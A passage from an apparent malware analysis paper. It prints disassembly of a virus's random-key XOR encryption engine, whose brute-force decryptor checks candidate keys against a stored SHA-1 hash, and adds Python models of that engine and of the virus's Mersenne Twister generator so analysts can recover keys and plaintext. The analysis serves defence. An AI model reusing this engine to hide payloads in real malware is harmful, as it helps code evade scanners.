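                self.mt[0] = self.mt[N - 1]
                i = 1
        self.mt[0] = 0x80000000                      # mov dword ptr [edi], 80000000h

    def _twist(self) -> None:
        """Regenerate all N words (genrand_int32 before @@_jump1)."""
        mt = self.mt
        for kk in range(N - M):                      # @@_loop2 up to 0E3h
            y = (mt[kk] & UPPER) | (mt[kk + 1] & LOWER)
            mt[kk] = mt[kk + M] ^ (y >> 1) ^ (MATRIX_A if y & 1 else 0)
        for kk in range(N - M, N - 1):               # @@_jump3 up to 26Fh
            y = (mt[kk] & UPPER) | (mt[kk + 1] & LOWER)
            mt[kk] = mt[kk + M - N] ^ (y >> 1) ^ (MATRIX_A if y & 1 else 0)
        y = (mt[N - 1] & UPPER) | (mt[0] & LOWER)    # @@_jump4: [edi+9bch], [edi]
        mt[N - 1] = mt[M - 1] ^ (y >> 1) ^ (MATRIX_A if y & 1 else 0)
        self.mti = 0                                 # and dword ptr [ebp+300h], 0

    def genrand_int32(self) -> int:
        """One output: take mt[mti], then the four tempering steps after @@_jump1."""
        if self.mti >= N:
            self._twist()
        y = self.mt[self.mti]
        self.mti += 1
        y ^= y >> 11                        # shr edx, 0Bh / xor ebx, edx
        y ^= (y << 7) & 0x9D2C5680          # shl edx, 7 / and edx, 9D2C5680h
        y ^= (y << 15) & 0xEFC60000         # shl edx, 0Fh / and edx, 0EFC60000h
        y ^= y >> 18                        # shr edx, 12h
        return y & MASK32

    def random_number(self, bound: int) -> int:
        """RandomNumber: genrand_int32 reduced modulo the bound passed in EAX."""
        return self.genrand_int32() % bound


if __name__ == "__main__":
    g = MT19937()
    g.init_genrand(5489)
    print([g.genrand_int32() for _ in range(3)])   # starts 3499211612, 581869302
    g.init_genrand(5489)
    print("RandomNumber(3) ->", g.random_number(3))
```

Because the generator is a known, fully deterministic design, an analyst who recovers the seed the virus feeds into init_genrand or init_by_array can replay every value RandomNumber returned, including the payload trigger roll (mov eax, 3 / call RandomNumber) and the RDKE32 key choice.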

CODE:00401D7B call cryptor
CODE:00401D80 popa
CODE:00401D81 retn 10h
CODE:00401D81 RDKE32Encrypt endp

The previous code block is the random decoding key engine (RDKE) encryptor of the virus.

CODE:00401D84 RDKE32Decrypt proc near
CODE:00401D84 arg_0 = dword ptr 4
CODE:00401D84 arg_4 = dword ptr 8
CODE:00401D84 arg_8 = dword ptr 0Ch
CODE:00401D84 pusha
CODE:00401D85 mov edi, [esp+20h+arg_0]
CODE:00401D89 mov ebx, [esp+20h+arg_4]
CODE:00401D8D mov ecx, [esp+20h+arg_8]
CODE:00401D91 sub esp, 14h
CODE:00401D94 mov esi, esp
CODE:00401D96 xor edx, edx
CODE:00401D98 bruteforce_loop:
CODE:00401D98 inc edx
CODE:00401D99 call cryptor
CODE:00401D9E push ebx
CODE:00401D9F push ecx
CODE:00401DA0 push esi
CODE:00401DA1 call SHA1
CODE:00401DA6 pusha
CODE:00401DA7 push 5
CODE:00401DA9 pop ecx
CODE:00401DAA repe cmpsd
CODE:00401DAC popa
CODE:00401DAD jz short RDKE32Decrypt_exit
CODE:00401DAF call cryptor
CODE:00401DB4 cmp ThreadExecution, 0FFFFFFFFh
CODE:00401DBB jz short RDKE32Decrypt_exit
CODE:00401DBD jmp short bruteforce_loop
CODE:00401DBF RDKE32Decrypt_exit:
CODE:00401DBF add esp, 14h
CODE:00401DC2 popa
CODE:00401DC3 retn 0Ch

CODE:00401DC3 RDKE32Decrypt endp

The previous code block is the random decoding key engine decryptor of the virus.

CODE:00401DD7 cryptor proc near
CODE:00401DD7 pusha
CODE:00401DD8 crypt_loop:
CODE:00401DD8 test dl, dl
CODE:00401DDA jz short dont_crypt
CODE:00401DDC xor [ebx], dl
CODE:00401DDE inc ebx
CODE:00401DDF dont_crypt:
CODE:00401DDF rol edx, 8
CODE:00401DE2 loop crypt_loop
CODE:00401DE4 popa
CODE:00401DE5 retn
CODE:00401DE5 cryptor endp

The previous code block is the 32-bit XOR encryptor and decryptor used by the engine.

CODE:00401DF0 SHA1 proc near
CODE:00401DF0 _temp_buffer = dword ptr -4E0h
CODE:00401DF0 var_4dc = dword ptr -4DCh
CODE:00401DF0 var_4d8 = dword ptr -4D8h
CODE:00401DF0 var_4d4 = dword ptr -4D4h
CODE:00401DF0 var_4d0 = dword ptr -4D0h
CODE:00401DF0 var_4cc = dword ptr -4CCh
CODE:00401DF0 var_4c8 = dword ptr -4C8h
CODE:00401DF0 var_4c4 = dword ptr -4C4h
CODE:00401DF0 var_4c0 = dword ptr -4C0h
CODE:00401DF0 var_4bc = dword ptr -4BCh
CODE:00401DF0 var_4b8 = dword ptr -4B8h
CODE:00401DF0 var_4b4 = dword ptr -4B4h
CODE:00401DF0 var_4b0 = dword ptr -4B0h
CODE:00401DF0 var_4ac = dword ptr -4ACh
CODE:00401DF0 var_4a8 = dword ptr -4A8h
CODE:00401DF0 var_4a4 = dword ptr -4A4h
CODE:00401DF0 var_2e0 = dword ptr -2E0h
CODE:00401DF0 var_2dc = dword ptr -2DCh
CODE:00401DF0 var_2d8 = dword ptr -2D8h
CODE:00401DF0 var_2d4 = dword ptr -2D4h
CODE:00401DF0 var_2d0 = dword ptr -2D0h
CODE:00401DF0 var_2cc = dword ptr -2CCh
CODE:00401DF0 _size = dword ptr -28Ch
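The following is an added example, not code from the paper or from the virus: a Python model of the cryptor, RDKE32Encrypt and RDKE32Decrypt routines above, written so that an analyst holding only a ciphertext and the 20-byte hash stored beside it can recover the plaintext the same way the decryptor does. The SHA1 routine's initial state (67452301h, 0EFCDAB89h, 98BADCFEh, 10325476h, 0C3D2E1F0h) and its round constant 5A827999h identify standard SHA-1, so hashlib stands in for it here. The plaintext and key in the demo are constructed; the real encryptor draws its key from RandomNumber(arg_c) + 1, so the key lies in 1..arg_c and the `max_key` parameter plays that role.

```python
# Added example (not the paper's or the virus's code): model of the RDKE32
# engine: XOR cryptor, SHA-1 of the plaintext as the only stored "key check",
# and the brute-force decryptor that searches keys until the hash matches.
import hashlib
from typing import Optional, Tuple

MASK32 = 0xFFFFFFFF


def rol32(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def cryptor(buf: bytearray, count: int, key: int) -> None:
    """Model of `cryptor` (EBX = buffer, ECX = count, EDX = 32-bit key).

    Each iteration XORs the current byte with the low key byte and advances one
    byte, unless that key byte is zero (test dl, dl / jz dont_crypt), in which
    case neither happens; the key is rotated left by 8 either way (rol edx, 8).
    A zero key byte therefore consumes a loop iteration without consuming a
    data byte, so fewer than `count` bytes are touched when the key has zero
    bytes. The position can never exceed `count`, so no overrun is possible.
    """
    pos = 0
    for _ in range(count):
        kb = key & 0xFF
        if kb != 0:
            buf[pos] ^= kb
            pos += 1
        key = rol32(key, 8)


def rdke32_encrypt(data: bytes, key: int) -> Tuple[bytes, bytes]:
    """RDKE32Encrypt with the key passed in instead of drawn from RandomNumber.
    Returns (SHA-1 of the plaintext, ciphertext); the key itself is not kept."""
    if not 1 <= key <= MASK32:
        raise ValueError("key must be a non-zero 32-bit value")
    digest = hashlib.sha1(data).digest()        # call SHA1 on the plaintext
    buf = bytearray(data)
    cryptor(buf, len(buf), key)                 # call cryptor
    return digest, bytes(buf)


def rdke32_decrypt(cipher: bytes, digest: bytes, max_key: int) -> Optional[Tuple[int, bytes]]:
    """RDKE32Decrypt: try EDX = 1, 2, ... and stop when SHA-1 of the decrypted
    buffer equals the stored digest (the repe cmpsd over 5 dwords).
    `max_key` bounds the search here; the virus instead runs until a match or
    until ThreadExecution is set. Returns (key, plaintext) or None."""
    buf = bytearray(cipher)
    for key in range(1, max_key + 1):
        cryptor(buf, len(buf), key)             # decrypt attempt
        if hashlib.sha1(buf).digest() == digest:
            return key, bytes(buf)
        cryptor(buf, len(buf), key)             # XOR is its own inverse: undo
    return None


if __name__ == "__main__":
    # Constructed sample data, not material from the analysed sample.
    plaintext = b"constructed plaintext for the RDKE32 model"
    stored_digest, ciphertext = rdke32_encrypt(plaintext, 0x2F1C)
    result = rdke32_decrypt(ciphertext, stored_digest, 0x4000)
    print("recovered key:", hex(result[0]) if result else None)
```

The cost of the search is one cryptor pass plus one SHA-1 per candidate key, so the size of arg_c fixes how long the decryptor, and an analyst reproducing it, has to spend; a hash of the plaintext stored in the clear is what makes the search terminate reliably, and it is also why a memory or file scanner can recognise the decrypted body once the loop finishes.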

CODE:00401DF0 _count = dword ptr -288h
CODE:00401DF0 _flag = dword ptr -284h
CODE:00401DF0 arg_0 = dword ptr 4
CODE:00401DF0 arg_4 = dword ptr 8
CODE:00401DF0 arg_8 = dword ptr 0Ch
CODE:00401DF0 pusha
CODE:00401DF1 sub esp, 260h
CODE:00401DF7 cld
CODE:00401DF8 mov ecx, [esp+280h+arg_4]
CODE:00401DFF mov esi, [esp+280h+arg_8]
CODE:00401E06 mov [esp+280h+_size], ecx
CODE:00401E0A or [esp+280h+_flag], 0FFFFFFFFh
CODE:00401E0F mov [esp+280h+_count], ecx
CODE:00401E13 mov [esp+280h+var_2dc], 67452301h
CODE:00401E1B mov [esp+280h+var_2d8], 0EFCDAB89h
CODE:00401E23 mov [esp+280h+var_2d4], 98BADCFEh
CODE:00401E2B mov [esp+280h+var_2d0], 10325476h
CODE:00401E33 mov [esp+280h+var_2cc], 0C3D2E1F0h
CODE:00401E3B SHA1_Loop:
CODE:00401E3B cmp [esp+280h+_count], 40h
CODE:00401E40 jb SHA1_LIPOF
CODE:00401E46 mov edi, [esp+280h+var_2dc]
CODE:00401E4A mov ebx, [esp+280h+var_2d8]
CODE:00401E4E mov ecx, [esp+280h+var_2d4]
CODE:00401E52 mov edx, [esp+280h+var_2d0]
CODE:00401E56 mov ebp, [esp+280h+var_2cc]
CODE:00401E5A mov [esp+280h+var_2e0], edi
CODE:00401E5E lodsd
CODE:00401E5F rol [esp+280h+var_2e0], 5
CODE:00401E64 bswap eax
CODE:00401E66 add ebp, [esp+280h+var_2e0]
CODE:00401E6A mov [esp+280h+_temp_buffer], eax
CODE:00401E71 mov [esp+280h+var_2e0], ecx
CODE:00401E75 xor [esp+280h+var_2e0], edx
CODE:00401E79 add ebp, eax
CODE:00401E7B and [esp+280h+var_2e0], ebx
CODE:00401E7F xor [esp+280h+var_2e0], edx
CODE:00401E83 ror ebx, 2
CODE:00401E86 lea ebp, [ebp+5a827999h]
CODE:00401E8C add ebp, [esp+280h+var_2e0]
CODE:00401E90 mov [esp+280h+var_2e0], ebp
CODE:00401E94 lodsd
CODE:00401E95 rol [esp+280h+var_2e0], 5
CODE:00401E9A bswap eax
CODE:00401E9C add edx, [esp+280h+var_2e0]
CODE:00401EA0 mov [esp+280h+var_4dc], eax
CODE:00401EA7 mov [esp+280h+var_2e0], ebx
CODE:00401EAB xor [esp+280h+var_2e0], ecx
CODE:00401EAF add edx, eax
CODE:00401EB1 and [esp+280h+var_2e0], edi
CODE:00401EB5 xor [esp+280h+var_2e0], ecx
CODE:00401EB9 ror edi, 2

CODE:00401EBC lea edx, [edx+5a827999h]
CODE:00401EC2 add edx, [esp+280h+var_2e0]
CODE:00401EC6 mov [esp+280h+var_2e0], edx
CODE:00401ECA lodsd
CODE:00401ECB rol [esp+280h+var_2e0], 5
CODE:00401ED0 bswap eax
CODE:00401ED2 add ecx, [esp+280h+var_2e0]
CODE:00401ED6 mov [esp+280h+var_4d8], eax
CODE:00401EDD mov [esp+280h+var_2e0], edi
CODE:00401EE1 xor [esp+280h+var_2e0], ebx
CODE:00401EE5 add ecx, eax
CODE:00401EE7 and [esp+280h+var_2e0], ebp
CODE:00401EEB xor [esp+280h+var_2e0], ebx
CODE:00401EEF ror ebp, 2
CODE:00401EF2 lea ecx, [ecx+5a827999h]
CODE:00401EF8 add ecx, [esp+280h+var_2e0]
CODE:00401EFC mov [esp+280h+var_2e0], ecx
CODE:00401F00 lodsd
CODE:00401F01 rol [esp+280h+var_2e0], 5
CODE:00401F06 bswap eax
CODE:00401F08 add ebx, [esp+280h+var_2e0]
CODE:00401F0C mov [esp+280h+var_4d4], eax
CODE:00401F13 mov [esp+280h+var_2e0], ebp
CODE:00401F17 xor [esp+280h+var_2e0], edi
CODE:00401F1B add ebx, eax
CODE:00401F1D and [esp+280h+var_2e0], edx
CODE:00401F21 xor [esp+280h+var_2e0], edi
CODE:00401F25 ror edx, 2
CODE:00401F28 lea ebx, [ebx+5a827999h]
CODE:00401F2E add ebx, [esp+280h+var_2e0]
CODE:00401F32 mov [esp+280h+var_2e0], ebx
CODE:00401F36 lodsd
CODE:00401F37 rol [esp+280h+var_2e0], 5
CODE:00401F3C bswap eax
CODE:00401F3E add edi, [esp+280h+var_2e0]
CODE:00401F42 mov [esp+280h+var_4d0], eax
CODE:00401F49 mov [esp+280h+var_2e0], edx
CODE:00401F4D xor [esp+280h+var_2e0], ebp
CODE:00401F51 add edi, eax
CODE:00401F53 and [esp+280h+var_2e0], ecx
CODE:00401F57 xor [esp+280h+var_2e0], ebp
CODE:00401F5B ror ecx, 2
CODE:00401F5E lea edi, [edi+5a827999h]
CODE:00401F64 add edi, [esp+280h+var_2e0]
CODE:00401F68 mov [esp+280h+var_2e0], edi
CODE:00401F6C lodsd
CODE:00401F6D rol [esp+280h+var_2e0], 5
CODE:00401F72 bswap eax
CODE:00401F74 add ebp, [esp+280h+var_2e0]
CODE:00401F78 mov [esp+280h+var_4cc], eax
CODE:00401F7F mov [esp+280h+var_2e0], ecx
CODE:00401F83 xor [esp+280h+var_2e0], edx
CODE:00401F87 add ebp, eax
CODE:00401F89 and [esp+280h+var_2e0], ebx
CODE:00401F8D xor [esp+280h+var_2e0], edx
CODE:00401F91 ror ebx, 2
CODE:00401F94 lea ebp, [ebp+5a827999h]

CODE:00401F9A add ebp, [esp+280h+var_2e0]
CODE:00401F9E mov [esp+280h+var_2e0], ebp
CODE:00401FA2 lodsd
CODE:00401FA3 rol [esp+280h+var_2e0], 5
CODE:00401FA8 bswap eax
CODE:00401FAA add edx, [esp+280h+var_2e0]
CODE:00401FAE mov [esp+280h+var_4c8], eax
CODE:00401FB5 mov [esp+280h+var_2e0], ebx
CODE:00401FB9 xor [esp+280h+var_2e0], ecx
CODE:00401FBD add edx, eax
CODE:00401FBF and [esp+280h+var_2e0], edi
CODE:00401FC3 xor [esp+280h+var_2e0], ecx
CODE:00401FC7 ror edi, 2
CODE:00401FCA lea edx, [edx+5a827999h]
CODE:00401FD0 add edx, [esp+280h+var_2e0]
CODE:00401FD4 mov [esp+280h+var_2e0], edx
CODE:00401FD8 lodsd
CODE:00401FD9 rol [esp+280h+var_2e0], 5
CODE:00401FDE bswap eax
CODE:00401FE0 add ecx, [esp+280h+var_2e0]
CODE:00401FE4 mov [esp+280h+var_4c4], eax
CODE:00401FEB mov [esp+280h+var_2e0], edi
CODE:00401FEF xor [esp+280h+var_2e0], ebx
CODE:00401FF3 add ecx, eax
CODE:00401FF5 and [esp+280h+var_2e0], ebp
CODE:00401FF9 xor [esp+280h+var_2e0], ebx
CODE:00401FFD ror ebp, 2
CODE:00402000 lea ecx, [ecx+5a827999h]
CODE:00402006 add ecx, [esp+280h+var_2e0]
CODE:0040200A mov [esp+280h+var_2e0], ecx
CODE:0040200E lodsd
CODE:0040200F rol [esp+280h+var_2e0], 5
CODE:00402014 bswap eax
CODE:00402016 add ebx, [esp+280h+var_2e0]
CODE:0040201A mov [esp+280h+var_4c0], eax
CODE:00402021 mov [esp+280h+var_2e0], ebp
CODE:00402025 xor [esp+280h+var_2e0], edi
CODE:00402029 add ebx, eax
CODE:0040202B and [esp+280h+var_2e0], edx
CODE:0040202F xor [esp+280h+var_2e0], edi
CODE:00402033 ror edx, 2
CODE:00402036 lea ebx, [ebx+5a827999h]
CODE:0040203C add ebx, [esp+280h+var_2e0]
CODE:00402040 mov [esp+280h+var_2e0], ebx
CODE:00402044 lodsd
CODE:00402045 rol [esp+280h+var_2e0], 5
CODE:0040204A bswap eax
CODE:0040204C add edi, [esp+280h+var_2e0]
CODE:00402050 mov [esp+280h+var_4bc], eax
CODE:00402057 mov [esp+280h+var_2e0], edx
CODE:0040205B xor [esp+280h+var_2e0], ebp
CODE:0040205F add edi, eax
CODE:00402061 and [esp+280h+var_2e0], ecx
CODE:00402065 xor [esp+280h+var_2e0], ebp
CODE:00402069 ror ecx, 2
CODE:0040206C lea edi, [edi+5a827999h]
CODE:00402072 add edi, [esp+280h+var_2e0]

CODE:00402076 mov [esp+280h+var_2e0], edi CODE:0040207A lodsd CODE:0040207B rol [esp+280h+var_2e0], 5 CODE:00402080 bswap eax CODE:00402082 add ebp, [esp+280h+var_2e0] CODE:00402086 mov [esp+280h+var_4b8], eax CODE:0040208D mov [esp+280h+var_2e0], ecx CODE:00402091 xor [esp+280h+var_2e0], edx CODE:00402095 add ebp, eax CODE:00402097 and [esp+280h+var_2e0], ebx CODE:0040209B xor [esp+280h+var_2e0], edx CODE:0040209F ror ebx, 2 CODE:004020A2 lea ebp, [ebp+5a827999h] CODE:004020A8 add ebp, [esp+280h+var_2e0] CODE:004020AC mov [esp+280h+var_2e0], ebp CODE:004020B0 lodsd CODE:004020B1 rol [esp+280h+var_2e0], 5 CODE:004020B6 bswap eax CODE:004020B8 add edx, [esp+280h+var_2e0] CODE:004020BC mov [esp+280h+var_4b4], eax CODE:004020C3 mov [esp+280h+var_2e0], ebx CODE:004020C7 xor [esp+280h+var_2e0], ecx CODE:004020CB add edx, eax CODE:004020CD and [esp+280h+var_2e0], edi CODE:004020D1 xor [esp+280h+var_2e0], ecx CODE:004020D5 ror edi, 2 CODE:004020D8 lea edx, [edx+5a827999h] CODE:004020DE add edx, [esp+280h+var_2e0] CODE:004020E2 mov [esp+280h+var_2e0], edx CODE:004020E6 lodsd CODE:004020E7 rol [esp+280h+var_2e0], 5 CODE:004020EC bswap eax CODE:004020EE add ecx, [esp+280h+var_2e0] CODE:004020F2 mov [esp+280h+var_4b0], eax CODE:004020F9 mov [esp+280h+var_2e0], edi CODE:004020FD xor [esp+280h+var_2e0], ebx CODE:00402101 add ecx, eax CODE:00402103 and [esp+280h+var_2e0], ebp CODE:00402107 xor [esp+280h+var_2e0], ebx CODE:0040210B ror ebp, 2 CODE:0040210E lea ecx, [ecx+5a827999h] CODE:00402114 add ecx, [esp+280h+var_2e0] CODE:00402118 mov [esp+280h+var_2e0], ecx CODE:0040211C lodsd CODE:0040211D rol [esp+280h+var_2e0], 5 CODE:00402122 bswap eax CODE:00402124 add ebx, [esp+280h+var_2e0] CODE:00402128 mov [esp+280h+var_4ac], eax CODE:0040212F mov [esp+280h+var_2e0], ebp CODE:00402133 xor [esp+280h+var_2e0], edi CODE:00402137 add ebx, eax CODE:00402139 and [esp+280h+var_2e0], edx CODE:0040213D xor [esp+280h+var_2e0], edi CODE:00402141 ror edx, 2 CODE:00402144 lea ebx, 
[ebx+5a827999h] CODE:0040214A add ebx, [esp+280h+var_2e0] CODE:0040214E mov [esp+280h+var_2e0], ebx

CODE:00402152 lodsd CODE:00402153 rol [esp+280h+var_2e0], 5 CODE:00402158 bswap eax CODE:0040215A add edi, [esp+280h+var_2e0] CODE:0040215E mov [esp+280h+var_4a8], eax CODE:00402165 mov [esp+280h+var_2e0], edx CODE:00402169 xor [esp+280h+var_2e0], ebp CODE:0040216D add edi, eax CODE:0040216F and [esp+280h+var_2e0], ecx CODE:00402173 xor [esp+280h+var_2e0], ebp CODE:00402177 ror ecx, 2 CODE:0040217A lea edi, [edi+5a827999h] CODE:00402180 add edi, [esp+280h+var_2e0] CODE:00402184 mov [esp+280h+var_2e0], edi CODE:00402188 lodsd CODE:00402189 rol [esp+280h+var_2e0], 5 CODE:0040218E bswap eax CODE:00402190 add ebp, [esp+280h+var_2e0] CODE:00402194 mov [esp+280h+var_4a4], eax CODE:0040219B mov [esp+280h+var_2e0], ecx CODE:0040219F xor [esp+280h+var_2e0], edx CODE:004021A3 add ebp, eax CODE:004021A5 and [esp+280h+var_2e0], ebx CODE:004021A9 xor [esp+280h+var_2e0], edx CODE:004021AD ror ebx, 2 CODE:004021B0 lea ebp, [ebp+5a827999h] CODE:004021B6 add ebp, [esp+280h+var_2e0] CODE:004021BA mov [esp+280h+var_2e0], ebp CODE:004021BE mov eax, [esp+280h+var_4ac] CODE:004021C5 rol [esp+280h+var_2e0], 5 CODE:004021CA xor eax, [esp+280h+var_4c0] CODE:004021D1 add edx, [esp+280h+var_2e0] CODE:004021D5 xor eax, [esp+280h+var_4d8] CODE:004021DC mov [esp+280h+var_2e0], ebx CODE:004021E0 xor eax, [esp+280h+_temp_buffer] CODE:004021E7 xor [esp+280h+var_2e0], ecx CODE:004021EB rol eax, 1 CODE:004021ED and [esp+280h+var_2e0], edi CODE:004021F1 mov [esp+280h+_temp_buffer], eax CODE:004021F8 xor [esp+280h+var_2e0], ecx CODE:004021FC add edx, eax CODE:004021FE ror edi, 2 CODE:00402201 lea edx, [edx+5a827999h] CODE:00402207 add edx, [esp+280h+var_2e0] CODE:0040220B mov [esp+280h+var_2e0], edx CODE:0040220F mov eax, [esp+280h+var_4a8] CODE:00402216 rol [esp+280h+var_2e0], 5 CODE:0040221B xor eax, [esp+280h+var_4bc] CODE:00402222 add ecx, [esp+280h+var_2e0] CODE:00402226 xor eax, [esp+280h+var_4d4] CODE:0040222D mov [esp+280h+var_2e0], edi CODE:00402231 xor eax, [esp+280h+var_4dc] CODE:00402238 
xor [esp+280h+var_2e0], ebx CODE:0040223C rol eax, 1 CODE:0040223E and [esp+280h+var_2e0], ebp CODE:00402242 mov [esp+280h+var_4dc], eax CODE:00402249 xor [esp+280h+var_2e0], ebx

CODE:0040224D add ecx, eax CODE:0040224F ror ebp, 2 CODE:00402252 lea ecx, [ecx+5a827999h] CODE:00402258 add ecx, [esp+280h+var_2e0] CODE:0040225C mov [esp+280h+var_2e0], ecx CODE:00402260 mov eax, [esp+280h+var_4a4] CODE:00402267 rol [esp+280h+var_2e0], 5 CODE:0040226C xor eax, [esp+280h+var_4b8] CODE:00402273 add ebx, [esp+280h+var_2e0] CODE:00402277 xor eax, [esp+280h+var_4d0] CODE:0040227E mov [esp+280h+var_2e0], ebp CODE:00402282 xor eax, [esp+280h+var_4d8] CODE:00402289 xor [esp+280h+var_2e0], edi CODE:0040228D rol eax, 1 CODE:0040228F and [esp+280h+var_2e0], edx CODE:00402293 mov [esp+280h+var_4d8], eax CODE:0040229A xor [esp+280h+var_2e0], edi CODE:0040229E add ebx, eax CODE:004022A0 ror edx, 2 CODE:004022A3 lea ebx, [ebx+5a827999h] CODE:004022A9 add ebx, [esp+280h+var_2e0] CODE:004022AD mov [esp+280h+var_2e0], ebx CODE:004022B1 mov eax, [esp+280h+_temp_buffer] CODE:004022B8 rol [esp+280h+var_2e0], 5 CODE:004022BD xor eax, [esp+280h+var_4b4] CODE:004022C4 add edi, [esp+280h+var_2e0] CODE:004022C8 xor eax, [esp+280h+var_4cc] CODE:004022CF mov [esp+280h+var_2e0], edx CODE:004022D3 xor eax, [esp+280h+var_4d4] CODE:004022DA xor [esp+280h+var_2e0], ebp CODE:004022DE rol eax, 1 CODE:004022E0 and [esp+280h+var_2e0], ecx CODE:004022E4 mov [esp+280h+var_4d4], eax CODE:004022EB xor [esp+280h+var_2e0], ebp CODE:004022EF add edi, eax CODE:004022F1 ror ecx, 2 CODE:004022F4 lea edi, [edi+5a827999h] CODE:004022FA add edi, [esp+280h+var_2e0] CODE:004022FE mov [esp+280h+var_2e0], edi CODE:00402302 mov eax, [esp+280h+var_4dc] CODE:00402309 rol [esp+280h+var_2e0], 5 CODE:0040230E xor eax, [esp+280h+var_4b0] CODE:00402315 add ebp, [esp+280h+var_2e0] CODE:00402319 xor eax, [esp+280h+var_4c8] CODE:00402320 mov [esp+280h+var_2e0], ebx CODE:00402324 xor eax, [esp+280h+var_4d0] CODE:0040232B xor [esp+280h+var_2e0], ecx CODE:0040232F rol eax, 1 CODE:00402331 xor [esp+280h+var_2e0], edx CODE:00402335 mov [esp+280h+var_4d0], eax CODE:0040233C add ebp, [esp+280h+var_2e0] CODE:00402340 
ror ebx, 2 CODE:00402343 lea ebp, [ebp+eax+6ed9eba1h] CODE:0040234A mov [esp+280h+var_2e0], ebp CODE:0040234E mov eax, [esp+280h+var_4d8] CODE:00402355 rol [esp+280h+var_2e0], 5 CODE:0040235A xor eax, [esp+280h+var_4ac]

CODE:00402361 add edx, [esp+280h+var_2e0] CODE:00402365 xor eax, [esp+280h+var_4c4] CODE:0040236C mov [esp+280h+var_2e0], edi CODE:00402370 xor eax, [esp+280h+var_4cc] CODE:00402377 xor [esp+280h+var_2e0], ebx CODE:0040237B rol eax, 1 CODE:0040237D xor [esp+280h+var_2e0], ecx CODE:00402381 mov [esp+280h+var_4cc], eax CODE:00402388 add edx, [esp+280h+var_2e0] CODE:0040238C ror edi, 2 CODE:0040238F lea edx, [edx+eax+6ed9eba1h] CODE:00402396 mov [esp+280h+var_2e0], edx CODE:0040239A mov eax, [esp+280h+var_4d4] CODE:004023A1 rol [esp+280h+var_2e0], 5 CODE:004023A6 xor eax, [esp+280h+var_4a8] CODE:004023AD add ecx, [esp+280h+var_2e0] CODE:004023B1 xor eax, [esp+280h+var_4c0] CODE:004023B8 mov [esp+280h+var_2e0], ebp CODE:004023BC xor eax, [esp+280h+var_4c8] CODE:004023C3 xor [esp+280h+var_2e0], edi CODE:004023C7 rol eax, 1 CODE:004023C9 xor [esp+280h+var_2e0], ebx CODE:004023CD mov [esp+280h+var_4c8], eax CODE:004023D4 add ecx, [esp+280h+var_2e0] CODE:004023D8 ror ebp, 2 CODE:004023DB lea ecx, [ecx+eax+6ed9eba1h] CODE:004023E2 mov [esp+280h+var_2e0], ecx CODE:004023E6 mov eax, [esp+280h+var_4d0] CODE:004023ED rol [esp+280h+var_2e0], 5 CODE:004023F2 xor eax, [esp+280h+var_4a4] CODE:004023F9 add ebx, [esp+280h+var_2e0] CODE:004023FD xor eax, [esp+280h+var_4bc] CODE:00402404 mov [esp+280h+var_2e0], edx CODE:00402408 xor eax, [esp+280h+var_4c4] CODE:0040240F xor [esp+280h+var_2e0], ebp CODE:00402413 rol eax, 1 CODE:00402415 xor [esp+280h+var_2e0], edi CODE:00402419 mov [esp+280h+var_4c4], eax CODE:00402420 add ebx, [esp+280h+var_2e0] CODE:00402424 ror edx, 2 CODE:00402427 lea ebx, [ebx+eax+6ed9eba1h] CODE:0040242E mov [esp+280h+var_2e0], ebx CODE:00402432 mov eax, [esp+280h+var_4cc] CODE:00402439 rol [esp+280h+var_2e0], 5 CODE:0040243E xor eax, [esp+280h+_temp_buffer] CODE:00402445 add edi, [esp+280h+var_2e0] CODE:00402449 xor eax, [esp+280h+var_4b8] CODE:00402450 mov [esp+280h+var_2e0], ecx CODE:00402454 xor eax, [esp+280h+var_4c0] CODE:0040245B xor [esp+280h+var_2e0], edx 
CODE:0040245F rol eax, 1 CODE:00402461 xor [esp+280h+var_2e0], ebp CODE:00402465 mov [esp+280h+var_4c0], eax CODE:0040246C add edi, [esp+280h+var_2e0] CODE:00402470 ror ecx, 2 CODE:00402473 lea edi, [edi+eax+6ed9eba1h] CODE:0040247A mov [esp+280h+var_2e0], edi

CODE:0040247E mov eax, [esp+280h+var_4c8] CODE:00402485 rol [esp+280h+var_2e0], 5 CODE:0040248A xor eax, [esp+280h+var_4dc] CODE:00402491 add ebp, [esp+280h+var_2e0] CODE:00402495 xor eax, [esp+280h+var_4b4] CODE:0040249C mov [esp+280h+var_2e0], ebx CODE:004024A0 xor eax, [esp+280h+var_4bc] CODE:004024A7 xor [esp+280h+var_2e0], ecx CODE:004024AB rol eax, 1 CODE:004024AD xor [esp+280h+var_2e0], edx CODE:004024B1 mov [esp+280h+var_4bc], eax CODE:004024B8 add ebp, [esp+280h+var_2e0] CODE:004024BC ror ebx, 2 CODE:004024BF lea ebp, [ebp+eax+6ed9eba1h] CODE:004024C6 mov [esp+280h+var_2e0], ebp CODE:004024CA mov eax, [esp+280h+var_4c4] CODE:004024D1 rol [esp+280h+var_2e0], 5 CODE:004024D6 xor eax, [esp+280h+var_4d8] CODE:004024DD add edx, [esp+280h+var_2e0] CODE:004024E1 xor eax, [esp+280h+var_4b0] CODE:004024E8 mov [esp+280h+var_2e0], edi CODE:004024EC xor eax, [esp+280h+var_4b8] CODE:004024F3 xor [esp+280h+var_2e0], ebx CODE:004024F7 rol eax, 1 CODE:004024F9 xor [esp+280h+var_2e0], ecx CODE:004024FD mov [esp+280h+var_4b8], eax CODE:00402504 add edx, [esp+280h+var_2e0] CODE:00402508 ror edi, 2 CODE:0040250B lea edx, [edx+eax+6ed9eba1h] CODE:00402512 mov [esp+280h+var_2e0], edx CODE:00402516 mov eax, [esp+280h+var_4c0] CODE:0040251D rol [esp+280h+var_2e0], 5 CODE:00402522 xor eax, [esp+280h+var_4d4] CODE:00402529 add ecx, [esp+280h+var_2e0] CODE:0040252D xor eax, [esp+280h+var_4ac] CODE:00402534 mov [esp+280h+var_2e0], ebp CODE:00402538 xor eax, [esp+280h+var_4b4] CODE:0040253F xor [esp+280h+var_2e0], edi CODE:00402543 rol eax, 1 CODE:00402545 xor [esp+280h+var_2e0], ebx CODE:00402549 mov [esp+280h+var_4b4], eax CODE:00402550 add ecx, [esp+280h+var_2e0] CODE:00402554 ror ebp, 2 CODE:00402557 lea ecx, [ecx+eax+6ed9eba1h] CODE:0040255E mov [esp+280h+var_2e0], ecx CODE:00402562 mov eax, [esp+280h+var_4bc] CODE:00402569 rol [esp+280h+var_2e0], 5 CODE:0040256E xor eax, [esp+280h+var_4d0] CODE:00402575 add ebx, [esp+280h+var_2e0] CODE:00402579 xor eax, [esp+280h+var_4a8] 
